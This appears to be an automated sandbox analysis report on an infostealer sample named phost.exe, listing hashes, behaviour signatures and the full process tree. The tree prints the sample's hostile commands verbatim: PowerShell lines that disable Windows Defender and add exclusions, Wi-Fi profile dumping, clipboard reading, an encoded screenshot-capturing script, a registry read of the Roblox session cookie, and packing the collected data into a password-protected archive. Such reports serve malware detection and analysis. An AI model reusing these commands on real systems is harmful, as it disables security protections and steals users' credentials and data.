Analysis

  • max time kernel
    90s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 07:18

General

  • Target

    phost.exe

  • Size

    7.5MB

  • MD5

    8c43bf4445cac5fa025b9dfd07517b6f

  • SHA1

    b7e9e405e3867213cd3e544574ceff70bef2b6fb

  • SHA256

    dcf517b48094726367f1fdb2ace3f2cfd29f4f9710512f45ecb0109d03cc0dcc

  • SHA512

    95097a7d6cbd1bf6ef197a740d70f98ba5dfd8081c3bee0f9f8e3bd100df36a949d5caa770c918f01f4c1d78227ba355026a3774ca2b06329fe6bc5bba00a8a3

  • SSDEEP

    196608:oPvLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jA:ajL+9qz8LD7fEUbiIqQgpA

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\phost.exe
    "C:\Users\Admin\AppData\Local\Temp\phost.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Users\Admin\AppData\Local\Temp\phost.exe
      "C:\Users\Admin\AppData\Local\Temp\phost.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4908
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\phost.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\phost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:776
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4884
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4464
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
          4⤵
            PID:1864
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4516
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:376
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3500
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4412
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4112
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4544
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:4204
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1804
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:3280
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4576
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:2880
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​‍​ .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​‍​ .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3964
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3864
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4296
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4180
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:5040
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:1396
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:4692
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  PID:3968
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4396
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:4392
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:4328
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:2064
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:1012
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2844
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:2576
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:1524
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:4608
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:4980
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:768
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:4744
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3652
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kql45a3i\kql45a3i.cmdline"
                                    5⤵
                                      PID:5092
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp" "c:\Users\Admin\AppData\Local\Temp\kql45a3i\CSC83BF3F3075B849E7921C621D5BABD469.TMP"
                                        6⤵
                                          PID:1104
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:3240
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:2288
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1500
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:2320
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:1868
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              4⤵
                                                PID:3280
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:2600
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:2728
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:2036
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                    3⤵
                                                      PID:3048
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                                        4⤵
                                                        • Drops file in Drivers directory
                                                        • Views/modifies file attributes
                                                        PID:2108
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:4284
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:3940
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          3⤵
                                                            PID:4260
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist /FO LIST
                                                              4⤵
                                                              • Enumerates processes with tasklist
                                                              PID:2732
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            3⤵
                                                              PID:2672
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                4⤵
                                                                  PID:1096
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:3532
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2092
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  3⤵
                                                                    PID:988
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4396
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                                    3⤵
                                                                      PID:4824
                                                                      • C:\Windows\system32\getmac.exe
                                                                        getmac
                                                                        4⤵
                                                                          PID:924
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24202\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\r0k1o.zip" *"
                                                                        3⤵
                                                                          PID:3244
                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI24202\rar.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI24202\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\r0k1o.zip" *
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:1936
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                          3⤵
                                                                            PID:3016
